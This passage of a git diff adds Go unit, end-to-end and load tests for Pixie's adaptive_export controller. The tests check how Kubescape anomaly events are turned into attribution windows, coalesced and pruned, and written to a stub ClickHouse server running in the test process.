+// runController starts c.Run on a background goroutine with a cancellable
+// context and returns a stop function. stop closes the trigger, cancels
+// the context and fails the test if Run has not returned within 1s.
+func runController(t *testing.T, c *Controller, trig *fakeTrigger) func() {
+	t.Helper()
+	ctx, cancel := context.WithCancel(context.Background())
+	finished := make(chan struct{})
+	go func() {
+		_ = c.Run(ctx)
+		close(finished)
+	}()
+
+	stop := func() {
+		trig.close()
+		cancel()
+		select {
+		case <-time.After(1 * time.Second):
+			t.Fatalf("controller did not stop within 1s")
+		case <-finished:
+		}
+	}
+	return stop
+}
+
+// defaultCfg is the baseline test config: host node-1 with a 5-minute
+// window on each side of an event.
+func defaultCfg() Config {
+	const window = 5 * time.Minute
+	return Config{
+		Hostname: "node-1",
+		Before:   window,
+		After:    window,
+	}
+}
+
+// ---------- tests ----------
+
+// TestController_NewWindow_FirstAnomalyOnTarget checks that the first event
+// on a hash produces a sink write whose window is
+// [event - Before, now + After] and whose identity fields mirror the
+// event's target.
+func TestController_NewWindow_FirstAnomalyOnTarget(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime.Add(time.Second)}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+	defer runController(t, c, trig)()
+
+	ev := canonicalEvent()
+	trig.push(ev)
+	waitFor(t, "first write", 200*time.Millisecond, func() bool { return len(snk.snapshot()) > 0 })
+
+	got := snk.snapshot()[0]
+	if want := anomaly.Hash(ev.Target); got.AnomalyHash != want {
+		t.Fatalf("hash = %q, want %q", got.AnomalyHash, want)
+	}
+	identityOK := got.PID == 106040 && got.Comm == "redis-server" && got.Namespace == "redis"
+	if !identityOK {
+		t.Fatalf("identity wrong: %+v", got)
+	}
+	if got.Hostname != "node-1" {
+		t.Fatalf("Hostname = %q", got.Hostname)
+	}
+	if want := canonicalEventTime.Add(-5 * time.Minute); !got.TStart.Equal(want) {
+		t.Fatalf("TStart = %v, want %v", got.TStart, want)
+	}
+	if want := clk.Now().Add(5 * time.Minute); !got.TEnd.Equal(want) {
+		t.Fatalf("TEnd = %v, want %v", got.TEnd, want)
+	}
+	if got.NAnomalies != 1 || got.LastRuleID != "R1005" {
+		t.Fatalf("LastRuleID/NAnomalies wrong: %+v", got)
+	}
+}
+
+// TestController_Coalesce_SecondAnomalySameHash checks that a second event
+// for the same target lands on the existing row: the active count stays
+// at 1, n_anomalies becomes 2, the rule id is updated and t_end moves to
+// the new now + After.
+func TestController_Coalesce_SecondAnomalySameHash(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime.Add(time.Second)}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+	defer runController(t, c, trig)()
+
+	written := func(n int) func() bool {
+		return func() bool { return len(snk.snapshot()) >= n }
+	}
+
+	trig.push(canonicalEvent())
+	waitFor(t, "first write", 200*time.Millisecond, written(1))
+
+	// Two minutes later the same target fires again under another rule.
+	const gap = 2 * time.Minute
+	clk.advance(gap)
+	second := canonicalEvent()
+	second.RuleID = "R0006"
+	second.EventTime = uint64(canonicalEventTime.Add(gap).UnixNano())
+	trig.push(second)
+	waitFor(t, "second write", 200*time.Millisecond, written(2))
+
+	if c.Active() != 1 {
+		t.Fatalf("Active = %d, want 1 (must coalesce on same hash)", c.Active())
+	}
+	got := snk.snapshot()[1]
+	if got.NAnomalies != 2 {
+		t.Fatalf("NAnomalies = %d, want 2", got.NAnomalies)
+	}
+	if got.LastRuleID != "R0006" {
+		t.Fatalf("LastRuleID = %q, want R0006", got.LastRuleID)
+	}
+	if wantEnd := clk.Now().Add(5 * time.Minute); !got.TEnd.Equal(wantEnd) {
+		t.Fatalf("TEnd = %v, want %v (must extend on coalesce)", got.TEnd, wantEnd)
+	}
+}
+
+// TestController_NeverShrinksTEnd checks that a repeat event processed at
+// an EARLIER clock reading leaves t_end where the first event put it.
+func TestController_NeverShrinksTEnd(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+	defer runController(t, c, trig)()
+
+	trig.push(canonicalEvent())
+	waitFor(t, "first", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 1 })
+	endBefore := snk.snapshot()[0].TEnd
+
+	// Rewind the fake clock by an hour — pathological, but the window
+	// must stay put.
+	clk.advance(-time.Hour)
+	trig.push(canonicalEvent())
+	waitFor(t, "second", 200*time.Millisecond, func() bool { return len(snk.snapshot()) >= 2 })
+
+	if got := snk.snapshot()[1]; !got.TEnd.Equal(endBefore) {
+		t.Fatalf("TEnd regressed: was %v, now %v", endBefore, got.TEnd)
+	}
+}
+
+// TestController_NewWindowForColdTarget checks that an event for a
+// different target opens a second active row next to the first one.
+func TestController_NewWindowForColdTarget(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+	defer runController(t, c, trig)()
+
+	for _, ev := range []kubescape.Event{canonicalEvent(), anotherTargetEvent()} {
+		trig.push(ev)
+	}
+	waitFor(t, "two active", 300*time.Millisecond, func() bool { return c.Active() == 2 })
+}
+
+// TestController_Rehydrate_FromSink checks that Rehydrate loads the
+// still-active rows for this controller's hostname and ignores rows that
+// belong to another host.
+func TestController_Rehydrate_FromSink(t *testing.T) {
+	t0 := canonicalEventTime
+	mine := sink.AttributionRow{
+		AnomalyHash: "h1", Hostname: "node-1", PID: 1, Comm: "x",
+		TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 5,
+	}
+	foreign := sink.AttributionRow{
+		AnomalyHash: "h2", Hostname: "node-OTHER", PID: 2, Comm: "y",
+		TStart: t0, TEnd: t0.Add(10 * time.Minute), LastSeen: t0, NAnomalies: 1,
+	}
+
+	trig := newFakeTrigger()
+	snk := &fakeSink{preload: []sink.AttributionRow{mine, foreign}}
+	c := New(trig, snk, defaultCfg(), &fakeClock{t: t0})
+
+	err := c.Rehydrate(context.Background())
+	if err != nil {
+		t.Fatalf("Rehydrate: %v", err)
+	}
+	if c.Active() != 1 {
+		t.Fatalf("Active after rehydrate = %d, want 1 (must filter by hostname)", c.Active())
+	}
+}
+
+// TestController_PruneExpired checks that an entry is dropped once the
+// clock is past its t_end plus the 2*After grace period.
+func TestController_PruneExpired(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime}
+		cfg  = Config{Hostname: "node-1", Before: time.Minute, After: time.Minute}
+	)
+	c := New(trig, snk, cfg, clk)
+	defer runController(t, c, trig)()
+
+	trig.push(canonicalEvent())
+	waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+	// With Before=After=1m the row's TEnd is now+1m, and PruneExpired
+	// only evicts after TEnd + 2*After, i.e. now+3m. Step just past it.
+	clk.advance(3*time.Minute + time.Second)
+	removed := c.PruneExpired()
+	if removed != 1 {
+		t.Fatalf("PruneExpired removed %d, want 1", removed)
+	}
+	if c.Active() != 0 {
+		t.Fatalf("Active after prune = %d, want 0", c.Active())
+	}
+}
+
+// TestController_SinkErrorNonFatal checks that a failing Sink.Write does
+// not stop the controller: the event is still tracked in the active set.
+func TestController_SinkErrorNonFatal(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{werr: errors.New("ch unreachable")}
+		clk  = &fakeClock{t: canonicalEventTime}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+	defer runController(t, c, trig)()
+
+	trig.push(canonicalEvent())
+	// Poll until the handler has processed the event (no fixed sleep).
+	tracked := func() bool { return c.Active() == 1 }
+	waitFor(t, "active=1 despite sink error", 200*time.Millisecond, tracked)
+}
+
+// TestController_RestartMidStream_Aborts checks that cancelling the context
+// makes Run return within 300ms, without the trigger channel being closed.
+func TestController_RestartMidStream_Aborts(t *testing.T) {
+	var (
+		trig = newFakeTrigger()
+		snk  = &fakeSink{}
+		clk  = &fakeClock{t: canonicalEventTime}
+	)
+	c := New(trig, snk, defaultCfg(), clk)
+
+	ctx, cancel := context.WithCancel(context.Background())
+	finished := make(chan struct{})
+	go func() {
+		_ = c.Run(ctx)
+		close(finished)
+	}()
+
+	trig.push(canonicalEvent())
+	waitFor(t, "controller picked up event", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+	cancel()
+	select {
+	case <-time.After(300 * time.Millisecond):
+		t.Fatalf("controller did not abort within 300ms of cancel")
+	case <-finished:
+	}
+}
+
+// ────────────────────────────────────────────────────────────────
+// Callbacks (rev-3 streaming hook): OnAttribution + OnPrune
+// ────────────────────────────────────────────────────────────────
+
+// attrCall records the arguments of one callback invocation in the tests
+// below: namespace, pod and (for OnAttribution) the reported t_end. The
+// OnPrune tests leave tEnd at its zero value.
+type attrCall struct {
+ ns, pod string
+ tEnd time.Time
+}
+
+// TestController_OnAttribution_FiresPerEvent checks that each kubescape
+// event — the one that opens the window and every extension on the same
+// hash — results in an OnAttribution callback carrying a pod and a
+// non-zero t_end.
+func TestController_OnAttribution_FiresPerEvent(t *testing.T) {
+	var (
+		mu    sync.Mutex
+		calls []attrCall
+	)
+	cfg := defaultCfg()
+	cfg.OnAttribution = func(ns, pod string, tEnd time.Time) {
+		mu.Lock()
+		calls = append(calls, attrCall{ns, pod, tEnd})
+		mu.Unlock()
+	}
+
+	trig := newFakeTrigger()
+	c := New(trig, &fakeSink{}, cfg, &fakeClock{t: canonicalEventTime})
+	defer runController(t, c, trig)()
+
+	// One opening event plus two extensions on the same hash.
+	for i := 0; i < 3; i++ {
+		trig.push(canonicalEvent())
+	}
+	waitFor(t, "3 attribution callbacks", 300*time.Millisecond, func() bool {
+		mu.Lock()
+		defer mu.Unlock()
+		return len(calls) == 3
+	})
+
+	mu.Lock()
+	defer mu.Unlock()
+	for _, call := range calls {
+		if call.pod == "" {
+			t.Fatalf("callback received empty pod: %+v", call)
+		}
+		if call.tEnd.IsZero() {
+			t.Fatalf("callback received zero tEnd: %+v", call)
+		}
+	}
+}
+
+// TestController_OnAttribution_NilIsNoop checks that handling an event with
+// no OnAttribution callback configured does not panic.
+func TestController_OnAttribution_NilIsNoop(t *testing.T) {
+	cfg := defaultCfg()
+	cfg.OnAttribution = nil // explicit
+
+	trig := newFakeTrigger()
+	c := New(trig, &fakeSink{}, cfg, &fakeClock{t: canonicalEventTime})
+	defer runController(t, c, trig)()
+
+	trig.push(canonicalEvent())
+	// Reaching active=1 without a panic is the whole assertion.
+	waitFor(t, "event landed", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+}
+
+// TestController_OnPrune_FiresWithKeyDetails — when the only hash on a
+// pod is evicted, PruneExpired must emit exactly one OnPrune callback
+// for that pod, with the pod name set. (OnPrune is per pod, not per
+// hash: PruneExpired only fires it for pods left without any active
+// hash.)
+func TestController_OnPrune_FiresWithKeyDetails(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+ var mu sync.Mutex
+ var pruned []attrCall
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ mu.Lock()
+ defer mu.Unlock()
+ pruned = append(pruned, attrCall{ns: ns, pod: pod})
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+ clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace
+ if r := c.PruneExpired(); r != 1 {
+ t.Fatalf("PruneExpired removed %d, want 1", r)
+ }
+ mu.Lock()
+ defer mu.Unlock()
+ if len(pruned) != 1 {
+ t.Fatalf("OnPrune fired %d times, want 1", len(pruned))
+ }
+ if pruned[0].pod == "" {
+ t.Fatalf("OnPrune called with empty pod: %+v", pruned[0])
+ }
+}
+
+// TestController_OnPrune_NilIsNoop checks that PruneExpired runs to
+// completion without panicking when no OnPrune callback is configured.
+func TestController_OnPrune_NilIsNoop(t *testing.T) {
+	cfg := Config{
+		Hostname: "node-1",
+		Before:   time.Minute,
+		After:    time.Minute,
+		OnPrune:  nil, // explicit
+	}
+	clk := &fakeClock{t: canonicalEventTime}
+	trig := newFakeTrigger()
+	c := New(trig, &fakeSink{}, cfg, clk)
+	defer runController(t, c, trig)()
+
+	trig.push(canonicalEvent())
+	waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+	clk.advance(3*time.Minute + time.Second)
+	// Not panicking is the pass condition; the count is irrelevant here.
+	_ = c.PruneExpired()
+}
+
+// TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone covers a pod that
+// carries several anomaly hashes. Distinct PID×comm combinations on one
+// pod each get their own hash (sweep observation: pgsql-server has hashes
+// for `postgres`, `pg_isready` and `runc:[2:INIT]` — three hashes, one
+// pod).
+//
+// The streaming layer is keyed by pod, so OnPrune(ns, pod) must be emitted
+// once for the pod when its hashes are evicted, not once per hash. Here
+// both hashes expire in the same prune, so exactly one callback is
+// expected.
+func TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone(t *testing.T) {
+	var (
+		mu         sync.Mutex
+		prunedPods []string
+	)
+	cfg := Config{
+		Hostname: "node-1",
+		Before:   time.Minute,
+		After:    time.Minute,
+		OnPrune: func(ns, pod string) {
+			mu.Lock()
+			prunedPods = append(prunedPods, ns+"/"+pod)
+			mu.Unlock()
+		},
+	}
+	clk := &fakeClock{t: canonicalEventTime}
+	trig := newFakeTrigger()
+	c := New(trig, &fakeSink{}, cfg, clk)
+	defer runController(t, c, trig)()
+
+	// Same pod, different (PID, Comm) → two distinct anomaly hashes.
+	eventFor := func(pid uint64, comm string) kubescape.Event {
+		target := anomaly.Target{PID: pid, Comm: comm, Pod: "pgsql-server-x", Namespace: "px"}
+		return kubescape.Event{
+			Target:    target,
+			EventTime: uint64(canonicalEventTime.UnixNano()),
+			RuleID:    "R1",
+			Hostname:  "node-1",
+		}
+	}
+	trig.push(eventFor(100, "postgres"))
+	trig.push(eventFor(200, "pg_isready"))
+	waitFor(t, "two distinct hashes active", 300*time.Millisecond, func() bool {
+		return c.Active() == 2
+	})
+
+	// Step past TEnd + 2*After so both hashes become evictable at once.
+	clk.advance(3*time.Minute + time.Second)
+	if removed := c.PruneExpired(); removed != 2 {
+		t.Fatalf("PruneExpired removed %d, want 2 hashes", removed)
+	}
+
+	mu.Lock()
+	defer mu.Unlock()
+	if len(prunedPods) != 1 {
+		t.Fatalf("OnPrune fired %d times for one pod with 2 hashes; want 1. Calls: %v",
+			len(prunedPods), prunedPods)
+	}
+	if prunedPods[0] != "px/pgsql-server-x" {
+		t.Fatalf("wrong pod pruned: %q", prunedPods[0])
+	}
+}
+
+// TestController_OnPrune_DoesNotFireWhileOtherHashesActive — the
+// inverse case: when only ONE of a pod's hashes expires, OnPrune must
+// stay silent for that pod because another hash on it is still active.
+func TestController_OnPrune_DoesNotFireWhileOtherHashesActive(t *testing.T) {
+	source := newFakeTrigger()
+	dst := &fakeSink{}
+	clock := &fakeClock{t: canonicalEventTime}
+
+	var mu sync.Mutex
+	var calls []string
+	ctl := New(source, dst, Config{
+		Hostname: "node-1", Before: time.Minute, After: time.Minute,
+		OnPrune: func(ns, pod string) {
+			mu.Lock()
+			defer mu.Unlock()
+			calls = append(calls, ns+"/"+pod)
+		},
+	}, clock)
+	shutdown := runController(t, ctl, source)
+	defer shutdown()
+
+	// pushPID sends an anomaly that differs from its siblings only by PID.
+	pushPID := func(pid uint64) {
+		source.push(kubescape.Event{
+			Target:    anomaly.Target{PID: pid, Comm: "c", Pod: "samepod", Namespace: "ns"},
+			EventTime: uint64(canonicalEventTime.UnixNano()),
+			RuleID:    "R1",
+			Hostname:  "node-1",
+		})
+	}
+	activeIs := func(want int) func() bool {
+		return func() bool { return ctl.Active() == want }
+	}
+	pushPID(100)
+	waitFor(t, "1 hash", 300*time.Millisecond, activeIs(1))
+
+	// At +2m the first hash is past its TEnd but still inside the
+	// 2*After grace; the second hash for the same pod arrives now.
+	clock.advance(2 * time.Minute)
+	pushPID(200)
+	waitFor(t, "2 hashes", 300*time.Millisecond, activeIs(2))
+
+	// +3m1s in total (2m + 1m + 1s): the FIRST hash is now beyond its
+	// grace (3m after creation), while the SECOND — TEnd at
+	// canonical+3m, grace until +5m — has to survive this prune.
+	clock.advance(time.Minute + time.Second)
+	if removed := ctl.PruneExpired(); removed != 1 {
+		t.Fatalf("PruneExpired removed %d, want 1 (only the old hash)", removed)
+	}
+	mu.Lock()
+	defer mu.Unlock()
+	if len(calls) != 0 {
+		t.Fatalf("OnPrune fired for a pod that still has 1 active hash; calls: %v", calls)
+	}
+}
+
+// TestController_OnAttribution_NotHeldUnderMutex — a slow callback
+// must NOT block PruneExpired's progress (the controller must not
+// be holding its own mutex while invoking user code).
+//
+// We arrange a synchronous OnPrune that blocks until we signal,
+// then call PruneExpired in a goroutine and confirm that we can
+// independently call Active() (which acquires the same mutex)
+// without deadlocking.
+func TestController_OnPrune_DoesNotHoldMutex(t *testing.T) {
+ trig := newFakeTrigger()
+ snk := &fakeSink{}
+ clk := &fakeClock{t: canonicalEventTime}
+
+ pruneInCallback := make(chan struct{})
+ release := make(chan struct{})
+
+ cfg := Config{
+ Hostname: "node-1", Before: time.Minute, After: time.Minute,
+ OnPrune: func(ns, pod string) {
+ close(pruneInCallback)
+ <-release
+ },
+ }
+ c := New(trig, snk, cfg, clk)
+ stop := runController(t, c, trig)
+ defer stop()
+
+ trig.push(canonicalEvent())
+ waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 })
+
+ clk.advance(3*time.Minute + time.Second)
+
+ pruneDone := make(chan struct{})
+ go func() {
+ _ = c.PruneExpired()
+ close(pruneDone)
+ }()
+
+ // Wait until the prune is inside the callback.
+ select {
+ case <-pruneInCallback:
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("OnPrune did not fire within 500ms")
+ }
+
+ // Active() acquires the same mutex; if PruneExpired holds it
+ // across the callback, this blocks forever.
+ activeDone := make(chan int, 1)
+ go func() { activeDone <- c.Active() }()
+
+ select {
+ case n := <-activeDone:
+ if n != 0 {
+ t.Fatalf("expected Active=0 (eviction happened before callback), got %d", n)
+ }
+ case <-time.After(500 * time.Millisecond):
+ t.Fatalf("Active() blocked — PruneExpired is holding the mutex across user callback")
+ }
+
+ close(release)
+ <-pruneDone
+}
+
+// TestEmptyResultSkip_NamespaceIsolation — an empty-result streak in
+// one namespace must not suppress queries for a pod of the same name
+// in another namespace. With two "api" pods ("ns-a" and "ns-b") on a
+// single PEM node, the earlier cache key — just "pod|table" — made
+// the two collide.
+func TestEmptyResultSkip_NamespaceIsolation(t *testing.T) {
+	const table = "stirling_http_events"
+	cfg := Config{
+		Hostname:              "node-1",
+		Before:                time.Minute,
+		After:                 time.Minute,
+		EmptyResultSkipAfterN: 2,
+		EmptyResultSkipTTL:    5 * time.Minute,
+	}
+	ctl := New(newFakeTrigger(), &fakeSink{}, cfg, &fakeClock{t: canonicalEventTime})
+
+	// Two empty results (EmptyResultSkipAfterN) for ns-a/api: only that pod may become skip-armed.
+	for n := 1; n <= 2; n++ {
+		ctl.noteQueryResult("ns-a", "api", table, 0)
+	}
+	if !ctl.shouldSkipEmpty("ns-a", "api", table) {
+		t.Fatalf("ns-a/api should be skip-armed after 2 empties")
+	}
+	if ctl.shouldSkipEmpty("ns-b", "api", table) {
+		t.Fatalf("ns-b/api was wrongly suppressed by ns-a/api's empty streak " +
+			"(skip cache key conflates namespaces)")
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel
new file mode 100644
index 00000000000..0721c6caa60
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel
@@ -0,0 +1,31 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+pl_go_test(
+ name = "e2e_test",
+ srcs = [
+ "e2e_test.go",
+ "loadtest_test.go",
+ ],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/controller",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "//src/vizier/services/adaptive_export/internal/trigger",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go
new file mode 100644
index 00000000000..4f2f0c2fc94
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go
@@ -0,0 +1,176 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package e2e wires the real Trigger + real Sink (both HTTP-backed)
+// to a stub ClickHouse in-process and exercises the full
+// kubescape→attribution path end-to-end. This is the highest-fidelity
+// test that runs in `go test`. Real-cluster validation lives on the
+// lab.
+package e2e
+
+import (
+ "bytes"
+ "context"
+ "encoding/json"
+ "io"
+ "net/http"
+ "net/http/httptest"
+ "strings"
+ "sync"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// stubClickHouse is an in-memory stand-in for ClickHouse's HTTP
+// interface: GET serves the canned kubescape rows as JSONEachRow and
+// POST records the INSERT query and body for later assertions.
+type stubClickHouse struct {
+ mu sync.Mutex // held by handle/bodies while touching the fields below
+ kubescape []map[string]any // rows encoded, one JSON object per line, on every GET
+ insertedSQL []string // "query" URL parameter of each POST, in arrival order
+ insertBody [][]byte // body of each POST; insertBody[i] pairs with insertedSQL[i]
+}
+
+// handle implements the stub: POST records the "query" parameter and
+// body, GET serves the canned rows once the SELECT has the expected shape.
+func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) {
+	q := r.URL.Query().Get("query")
+	switch {
+	case r.Method == http.MethodPost:
+		body, err := io.ReadAll(r.Body)
+		if err != nil { // never record a truncated INSERT as if it were complete
+			http.Error(w, "read body: "+err.Error(), http.StatusInternalServerError)
+			return
+		}
+		s.mu.Lock()
+		s.insertedSQL = append(s.insertedSQL, q)
+		s.insertBody = append(s.insertBody, body)
+		s.mu.Unlock() // returning without a write sends the implicit 200
+	case r.Method != http.MethodGet:
+		http.Error(w, "method", http.StatusMethodNotAllowed)
+	case !strings.Contains(q, "FROM forensic_db.kubescape_logs"):
+		http.Error(w, "unexpected SELECT: "+q, http.StatusBadRequest)
+	case !strings.Contains(q, "hostname = 'node-1'"):
+		http.Error(w, "missing hostname filter: "+q, http.StatusBadRequest)
+	default:
+		var buf bytes.Buffer
+		enc := json.NewEncoder(&buf)
+		enc.SetEscapeHTML(false)
+		s.mu.Lock()
+		for _, row := range s.kubescape {
+			_ = enc.Encode(row)
+		}
+		s.mu.Unlock()
+		_, _ = w.Write(buf.Bytes()) // the first Write sends the implicit 200
+	}
+}
+
+func (s *stubClickHouse) bodies() [][]byte {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	snapshot := make([][]byte, 0, len(s.insertBody))
+	for _, raw := range s.insertBody {
+		snapshot = append(snapshot, append([]byte{}, raw...)) // detached copy of each recorded body
+	}
+	return snapshot
+}
+
+func canonicalKubescapeRow() map[string]any {
+ return map[string]any{
+ "RuleID": "R1005",
+ "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`, // JSON document carried as a string
+ "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`, // JSON document carried as a string
+ "event_time": "1744477360303026359", // numeric value, but sent as a JSON string
+ "hostname": "node-1", // same host the stub's GET handler requires in the SELECT
+ }
+}
+
+// TestE2E_PushFlow_AttributionRowArrives — the whole chain in one go:
+// stub-CH serves a kubescape row → the real Trigger polls and parses it →
+// the real Controller hashes it → the real Sink POSTs an INSERT back to the
+// stub. The test passes once a recorded body carries the expected hash.
+func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) {
+	stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}}
+	srv := httptest.NewServer(http.HandlerFunc(stub.handle))
+	defer srv.Close()
+
+	trg, err := trigger.New(trigger.Config{
+		Endpoint:     srv.URL,
+		Hostname:     "node-1",
+		PollInterval: 30 * time.Millisecond,
+	})
+	if err != nil {
+		t.Fatalf("trigger.New: %v", err)
+	}
+	snk, err := sink.New(sink.Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+	ctl := controller.New(trg, snk, controller.Config{
+		Hostname: "node-1", Before: time.Minute, After: time.Minute,
+	}, nil)
+
+	ctx, cancel := context.WithCancel(context.Background())
+	stopped := make(chan struct{})
+	go func() { _ = ctl.Run(ctx); close(stopped) }()
+	defer func() {
+		cancel()
+		select {
+		case <-stopped:
+		case <-time.After(2 * time.Second):
+			t.Fatalf("controller did not stop within 2s of cancel")
+		}
+	}()
+
+	// Poll until the first INSERT reaches the stub, for at most 2s.
+	deadline := time.Now().Add(2 * time.Second)
+	for time.Now().Before(deadline) && len(stub.bodies()) == 0 {
+		time.Sleep(5 * time.Millisecond)
+	}
+	bodies := stub.bodies()
+	if len(bodies) == 0 {
+		t.Fatalf("no INSERTs reached stub-CH within 2s")
+	}
+
+	wantHash := string(anomaly.Hash(anomaly.Target{
+		PID: 106040, Comm: "redis-server",
+		Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis",
+	}))
+	found := false
+	for i := 0; i < len(bodies) && !found; i++ {
+		body := string(bodies[i])
+		found = strings.Contains(body, `"anomaly_hash":"`+wantHash+`"`) &&
+			strings.Contains(body, `"hostname":"node-1"`) &&
+			strings.Contains(body, `"namespace":"redis"`) &&
+			strings.Contains(body, `"pid":106040`)
+	}
+	if !found {
+		t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies))
+	}
+}
+
+func joinBodies(bs [][]byte) string {
+	parts := make([]string, 0, len(bs))
+	for _, raw := range bs { // each body becomes one "---"-separated section
+		parts = append(parts, string(raw))
+	}
+	return strings.Join(parts, "\n---\n")
+}
diff --git a/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go
new file mode 100644
index 00000000000..3f88e90bf96
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go
@@ -0,0 +1,256 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// L1 — hermetic load-test layer for the AE write surface.
+//
+// This is the deterministic, in-process counterpart to the live (L3) rig
+// experiments of the `aeload` rig. It exercises the SAME real
+// Trigger + Controller + Sink chain as e2e_test.go, but feeds Pixie's data
+// plane from a MOCK PixieQuerier returning a CANNED row set. Both the kubescape
+// trigger fixture and the Pixie capture are therefore fully controlled, so the
+// AE write surface — control plane (adaptive_attribution) AND data plane
+// (per-protocol-table rows + bytes) — is a pure function of the inputs.
+//
+// Reproducibility is proven by running the whole chain REPS times and asserting
+// that every per-table row count, byte total, and the attribution count is
+// identical across all reps (std = 0 / a single distinct value). Single-pull is
+// forced via PushRefreshInterval = -1 (single-shot), the same effect the L3
+// config achieves on the rig — so the non-deduping MergeTree protocol tables
+// never get duplicate re-inserts.
+package e2e
+
+import (
+ "context"
+ "fmt"
+ "net/http"
+ "net/http/httptest"
+ "regexp"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger"
+)
+
+// newStubServer starts an httptest server that routes every request to s.handle; the caller closes it.
+func newStubServer(s *stubClickHouse) *httptest.Server {
+ return httptest.NewServer(http.HandlerFunc(s.handle))
+}
+
+// sqls snapshots the recorded INSERT query strings; element i belongs to
+// element i of bodies().
+func (s *stubClickHouse) sqls() []string {
+	s.mu.Lock()
+	defer s.mu.Unlock()
